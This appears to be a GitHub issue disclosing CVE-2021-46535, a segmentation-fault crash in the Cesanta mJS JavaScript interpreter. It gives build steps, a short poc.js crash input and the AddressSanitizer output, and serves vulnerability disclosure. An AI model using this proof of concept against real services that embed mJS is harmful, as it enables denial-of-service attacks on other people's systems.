Headline
CVE-2021-46535: SEGV (/usr/local/bin/mjs+0xe533e) · Issue #209 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0xe533e. This vulnerability can lead to a Denial of Service (DoS).
mJS revision
Commit: b1b6eac
Version:
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
isNaN(--isNaN) !== true
if (isNaN(-function () { return 1 }) !== true) {
$ERROR('#Error' + (-function () { return 1 }));
}
Execution steps & Output
$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==36318==ERROR: AddressSanitizer: SEGV on unknown address 0x559b7cd412cc (pc 0x559b7cd4133f bp 0x000000000043 sp 0x7fff0319d2b8 T0) ==36318==The signal is caused by a WRITE memory access. #0 0x559b7cd4133e (/usr/local/bin/mjs+0xe533e)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0xe533e) ==36318==ABORTING
Credits: Found by OWL337 team.